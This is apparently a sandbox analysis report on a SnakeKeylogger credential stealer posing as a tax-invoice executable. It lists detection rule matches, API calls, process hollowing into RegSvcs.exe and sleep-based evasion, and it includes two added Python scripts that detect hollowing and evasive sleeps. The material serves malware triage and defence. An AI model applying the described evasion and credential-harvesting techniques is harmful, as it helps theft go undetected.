Source: 0.2.(STC) Tax Invoice 25030216_REV.exe.3830000.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.(STC) Tax Invoice 25030216_REV.exe.3830000.1.raw.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.(STC) Tax Invoice 25030216_REV.exe.3830000.1.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.(STC) Tax Invoice 25030216_REV.exe.3830000.1.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.(STC) Tax Invoice 25030216_REV.exe.3830000.1.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.(STC) Tax Invoice 25030216_REV.exe.3830000.1.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 2.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 2.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 2.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 00000002.00000002.3700812554.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000000.00000002.1238598112.0000000003830000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000000.00000002.1238598112.0000000003830000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000000.00000002.1238598112.0000000003830000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: Process Memory Space: (STC) Tax Invoice 25030216_REV.exe PID: 6796, type: MEMORYSTR Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: RegSvcs.exe PID: 604, type: MEMORYSTR Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.(STC) Tax Invoice 25030216_REV.exe.3830000.1.raw.unpack, ---.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.(STC) Tax Invoice 25030216_REV.exe.3830000.1.raw.unpack, ---.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.(STC) Tax Invoice 25030216_REV.exe.3830000.1.raw.unpack, U---.cs Cryptographic APIs: 'TransformFinalBlock'
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@3/2@3/3
Source: C:\Users\user\Desktop\(STC) Tax Invoice 25030216_REV.exe Code function: 0_2_00E8A06A GetLastError,FormatMessageW, 0_2_00E8A06A
Source: C:\Users\user\Desktop\(STC) Tax Invoice 25030216_REV.exe Code function: 0_2_00E781CB AdjustTokenPrivileges,CloseHandle, 0_2_00E781CB
Source: C:\Users\user\Desktop\(STC) Tax Invoice 25030216_REV.exe Code function: 0_2_00E787E1 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError, 0_2_00E787E1
Source: C:\Users\user\Desktop\(STC) Tax Invoice 25030216_REV.exe Code function: 0_2_00E8B3FB SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode, 0_2_00E8B3FB
Source: C:\Users\user\Desktop\(STC) Tax Invoice 25030216_REV.exe Code function: 0_2_00E9EE0D CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle, 0_2_00E9EE0D
Source: C:\Users\user\Desktop\(STC) Tax Invoice 25030216_REV.exe Code function: 0_2_00E983BB CoInitialize,CoUninitialize,CoCreateInstance,IIDFromString,VariantInit,VariantClear, 0_2_00E983BB
Source: C:\Users\user\Desktop\(STC) Tax Invoice 25030216_REV.exe Code function: 0_2_00E24E89 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource, 0_2_00E24E89
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Mutant created: NULL
Source: C:\Users\user\Desktop\(STC) Tax Invoice 25030216_REV.exe File created: C:\Users\user\AppData\Local\Temp\aut7810.tmp
Source: (STC) Tax Invoice 25030216_REV.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\(STC) Tax Invoice 25030216_REV.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: RegSvcs.exe, 00000002.00000002.3702479918.0000000002B92000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3702479918.0000000002BA0000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3702479918.0000000002B82000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3702479918.0000000002BC6000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3702479918.0000000002BD2000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: (STC) Tax Invoice 25030216_REV.exe ReversingLabs: Detection: 77%
Source: (STC) Tax Invoice 25030216_REV.exe Virustotal: Detection: 73%
Source: unknown Process created: C:\Users\user\Desktop\(STC) Tax Invoice 25030216_REV.exe "C:\Users\user\Desktop\(STC) Tax Invoice 25030216_REV.exe"
Source: C:\Users\user\Desktop\(STC) Tax Invoice 25030216_REV.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\(STC) Tax Invoice 25030216_REV.exe"
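The process tree above shows the pattern a triager should key on: the AutoIt-compiled dropper starts the legitimate .NET utility RegSvcs.exe, but the child's command line is the dropper's own path rather than RegSvcs.exe, which is how a hollowed or injected host usually appears in process-creation telemetry. The script below is an added example and not part of the Joe Sandbox report; it runs a detection for that mismatch over constructed Sysmon-style events modelled on the report's tree. The list of .NET host binaries, the user-writable path prefixes and the reason labels are assumptions chosen for the example.

```python
"""Flag .NET utilities launched with a foreign command line (hollowing indicator).

Added example for triaging process-creation telemetry; not part of the sandbox
report. The sample events are constructed, modelled on the report's process tree.
"""
from dataclasses import dataclass
from pathlib import PureWindowsPath

# .NET framework utilities that loaders commonly inject into (assumption; extend as needed).
NET_HOSTS = {"regsvcs.exe", "regasm.exe", "installutil.exe", "aspnet_compiler.exe"}

# Locations a standard user can write to (assumption; tune to the estate).
USER_WRITABLE_PREFIXES = ("c:\\users\\", "c:\\programdata\\", "c:\\windows\\temp\\")


@dataclass(frozen=True)
class ProcEvent:
    image: str          # full path of the created process, as the sensor records it
    command_line: str   # command line of the created process
    parent_image: str   # full path of the parent process


def first_token(command_line: str) -> str:
    """Return the executable token of a Windows command line, honouring a quoted path."""
    s = command_line.strip()
    if s.startswith('"'):
        end = s.find('"', 1)
        return s[1:end] if end != -1 else s[1:]
    return s.split(None, 1)[0] if s else ""


def is_hollowed_net_host(ev: ProcEvent) -> bool:
    """True when a .NET host binary was started with a command line naming another executable."""
    image_name = PureWindowsPath(ev.image).name.lower()
    if image_name not in NET_HOSTS:
        return False
    cmd_name = PureWindowsPath(first_token(ev.command_line)).name.lower()
    return cmd_name != image_name


def parent_in_user_writable_path(ev: ProcEvent) -> bool:
    return ev.parent_image.lower().startswith(USER_WRITABLE_PREFIXES)


def triage(ev: ProcEvent) -> list:
    """Return the list of reasons an event is suspicious; empty list means benign."""
    reasons = []
    if is_hollowed_net_host(ev):
        reasons.append("net-host-foreign-cmdline")
        if parent_in_user_writable_path(ev):
            reasons.append("parent-in-user-writable-path")
    return reasons


def flag_events(events):
    return [(ev, r) for ev in events if (r := triage(ev))]


SAMPLE_EVENTS = [  # constructed, modelled on the report's process tree
    ProcEvent(  # RegSvcs.exe started with the dropper's path as its command line
        image=r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe",
        command_line=r'"C:\Users\user\Desktop\(STC) Tax Invoice 25030216_REV.exe"',
        parent_image=r"C:\Users\user\Desktop\(STC) Tax Invoice 25030216_REV.exe",
    ),
    ProcEvent(  # benign: an installer registering a COM+ assembly with RegSvcs
        image=r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe",
        command_line=r'"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" /fc MyApp.dll',
        parent_image=r"C:\Windows\System32\msiexec.exe",
    ),
    ProcEvent(  # not a .NET host binary: ignored by the rule
        image=r"C:\Windows\System32\notepad.exe",
        command_line=r"notepad.exe C:\Temp\notes.txt",
        parent_image=r"C:\Windows\explorer.exe",
    ),
]

if __name__ == "__main__":
    for ev, reasons in flag_events(SAMPLE_EVENTS):
        print(ev.image, "<-", ev.parent_image, reasons)
```

The same comparison translates directly into a Sysmon Event ID 1 or EDR query: image basename in the host list and command-line executable basename not equal to it. Benign RegSvcs.exe invocations name RegSvcs.exe itself in the command line, so the mismatch alone carries most of the signal; the parent-path check is a second factor for prioritisation rather than a requirement.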
Source: C:\Users\user\Desktop\(STC) Tax Invoice 25030216_REV.exe Section loaded: wsock32.dll
Source: C:\Users\user\Desktop\(STC) Tax Invoice 25030216_REV.exe Section loaded: version.dll
Source: C:\Users\user\Desktop\(STC) Tax Invoice 25030216_REV.exe Section loaded: winmm.dll
Source: C:\Users\user\Desktop\(STC) Tax Invoice 25030216_REV.exe Section loaded: mpr.dll
Source: C:\Users\user\Desktop\(STC) Tax Invoice 25030216_REV.exe Section loaded: wininet.dll
Source: C:\Users\user\Desktop\(STC) Tax Invoice 25030216_REV.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\(STC) Tax Invoice 25030216_REV.exe Section loaded: userenv.dll
Source: C:\Users\user\Desktop\(STC) Tax Invoice 25030216_REV.exe Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\(STC) Tax Invoice 25030216_REV.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\(STC) Tax Invoice 25030216_REV.exe Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\(STC) Tax Invoice 25030216_REV.exe Section loaded: wldp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: (STC) Tax Invoice 25030216_REV.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: (STC) Tax Invoice 25030216_REV.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: (STC) Tax Invoice 25030216_REV.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: (STC) Tax Invoice 25030216_REV.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: (STC) Tax Invoice 25030216_REV.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: (STC) Tax Invoice 25030216_REV.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: Binary string: wntdll.pdbUGP source: (STC) Tax Invoice 25030216_REV.exe, 00000000.00000003.1236873842.0000000003F40000.00000004.00001000.00020000.00000000.sdmp, (STC) Tax Invoice 25030216_REV.exe, 00000000.00000003.1237139316.0000000003DA0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: (STC) Tax Invoice 25030216_REV.exe, 00000000.00000003.1236873842.0000000003F40000.00000004.00001000.00020000.00000000.sdmp, (STC) Tax Invoice 25030216_REV.exe, 00000000.00000003.1237139316.0000000003DA0000.00000004.00001000.00020000.00000000.sdmp
Source: (STC) Tax Invoice 25030216_REV.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: (STC) Tax Invoice 25030216_REV.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: (STC) Tax Invoice 25030216_REV.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: (STC) Tax Invoice 25030216_REV.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: (STC) Tax Invoice 25030216_REV.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
Source: C:\Users\user\Desktop\(STC) Tax Invoice 25030216_REV.exe Code function: 0_2_00E24B37 LoadLibraryA,GetProcAddress, 0_2_00E24B37
Source: C:\Users\user\Desktop\(STC) Tax Invoice 25030216_REV.exe Code function: 0_2_00E48945 push ecx; ret 0_2_00E48958
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_027B9C30 push esp; retf 0290h 2_2_027B9D55
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_027B8926 pushad ; iretd 2_2_027B8927
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_027B8C37 pushfd ; iretd 2_2_027B8C38
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_027B8DE7 push esp; iretd 2_2_027B8DE8
Source: C:\Users\user\Desktop\(STC) Tax Invoice 25030216_REV.exe Code function: 0_2_00E248D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput, 0_2_00E248D7
Source: C:\Users\user\Desktop\(STC) Tax Invoice 25030216_REV.exe Code function: 0_2_00EA5376 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed, 0_2_00EA5376
Source: C:\Users\user\Desktop\(STC) Tax Invoice 25030216_REV.exe Code function: 0_2_00E43187 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 0_2_00E43187
Source: C:\Users\user\Desktop\(STC) Tax Invoice 25030216_REV.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: C:\Users\user\Desktop\(STC) Tax Invoice 25030216_REV.exe API/Special instruction interceptor: Address: 16636BC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 600000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 599875
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 599766
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 599641
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 599531
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 599422
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 599312
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 599203
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 599094
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 598984
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 598875
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 598766
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 598641
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 598516
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 598406
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 598297
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 598187
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 598078
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 597930
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 597813
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 597696
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 597578
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 597453
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 597344
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 597234
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 597125
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 597016
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 596906
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 596797
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 596688
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 596563
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 596438
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 596328
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 596219
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 596094
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 595984
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 595875
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 595766
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 595656
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 595546
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 595436
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 595328
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 595219
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 595084
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 594850
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 594625
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 594516
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 594406
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 594297
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 594188
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 594078
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Window / User API: threadDelayed 7624
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Window / User API: threadDelayed 2224
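The thread-delay list above carries three separate evasion signals worth pulling out when reading a report like this. The first value, 922337203685477, is TimeSpan.MaxValue expressed in milliseconds (Int64.MaxValue ticks divided by 10,000 ticks per millisecond), i.e. a .NET request to sleep effectively forever. The remaining values start at 600000 (ten minutes, reading the report's figures as milliseconds) and each is slightly shorter than the one before, which is the footprint of a loop that repeatedly re-sleeps for the time remaining until a target timestamp rather than a single long sleep, a pattern that survives sandboxes that shorten or skip individual sleeps. The script below is an added example, not part of the Joe Sandbox report: it parses report lines of this form and scores them on those three indicators. The 3-minute threshold and the minimum countdown length are assumptions chosen for the example; the sample lines are constructed with values copied from the list above.

```python
"""Score "Thread delayed" telemetry for sleep-based sandbox evasion.

Added example, not part of the sandbox report. Parses lines of the form
"Thread delayed: delay time: N" (N read as milliseconds) and reports the .NET
infinite-sleep sentinel, total requested sleep, and the longest run of delays that
each shrink slightly (a loop re-sleeping for the time left until a deadline).
"""
import re
from dataclasses import dataclass

# TimeSpan.MaxValue in milliseconds: Int64.MaxValue ticks / 10_000 ticks per ms.
TIMESPAN_MAX_MS = (2**63 - 1) // 10_000   # 922337203685477

DELAY_RE = re.compile(r"Thread delayed: delay time: (\d+)")


def parse_delays(lines):
    """Extract the delay values, in order, from report lines; non-matching lines are skipped."""
    return [int(m.group(1)) for line in lines if (m := DELAY_RE.search(line))]


@dataclass
class SleepAssessment:
    infinite_sleeps: int      # delays equal to or beyond TimeSpan.MaxValue
    total_finite_ms: int      # sum of all other delays
    longest_countdown: int    # longest run of strictly decreasing consecutive delays
    evasive: bool


def assess(delays, threshold_ms=180_000, min_countdown=10):
    """Flag a delay sequence as evasive on any of three indicators.

    threshold_ms: total finite sleep considered a stall (assumption: 3 minutes).
    min_countdown: run length of shrinking delays treated as a deadline loop (assumption).
    """
    infinite = sum(1 for d in delays if d >= TIMESPAN_MAX_MS)
    finite = [d for d in delays if d < TIMESPAN_MAX_MS]
    total = sum(finite)

    longest = run = 1 if finite else 0
    for prev, cur in zip(finite, finite[1:]):
        run = run + 1 if cur < prev else 1
        longest = max(longest, run)

    evasive = infinite > 0 or total >= threshold_ms or longest >= min_countdown
    return SleepAssessment(infinite, total, longest, evasive)


SAMPLE_REPORT_LINES = [  # constructed; delay values copied from the report's evasion section
    "Source: RegSvcs.exe Thread delayed: delay time: 922337203685477",
    "Source: RegSvcs.exe Thread delayed: delay time: 600000",
    "Source: RegSvcs.exe Thread delayed: delay time: 599875",
    "Source: RegSvcs.exe Thread delayed: delay time: 599766",
    "Source: RegSvcs.exe Thread delayed: delay time: 599641",
    "Source: RegSvcs.exe Thread delayed: delay time: 599531",
    "Source: RegSvcs.exe Window / User API: threadDelayed 7624",  # different signature, ignored
]

if __name__ == "__main__":
    print(assess(parse_delays(SAMPLE_REPORT_LINES)))
```

When the same logic runs over a full report, the countdown run length is the more robust indicator: a single large sleep is trivially shortened by the sandbox, but a run of dozens of shrinking delays means the sample is re-measuring wall-clock time between sleeps, and shortening the sleeps does not shorten the wait.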
Source: C:\Users\user\Desktop\(STC) Tax Invoice 25030216_REV.exe API coverage: 4.5 %
Source: C:\Users\user\Desktop\(STC) Tax Invoice 25030216_REV.exe Code function: 0_2_00E8445A GetFileAttributesW,FindFirstFileW,FindClose, 0_2_00E8445A
Source: C:\Users\user\Desktop\(STC) Tax Invoice 25030216_REV.exe Code function: 0_2_00E8C6D1 FindFirstFileW,FindClose, 0_2_00E8C6D1
Source: C:\Users\user\Desktop\(STC) Tax Invoice 25030216_REV.exe Code function: 0_2_00E8C75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf, 0_2_00E8C75C
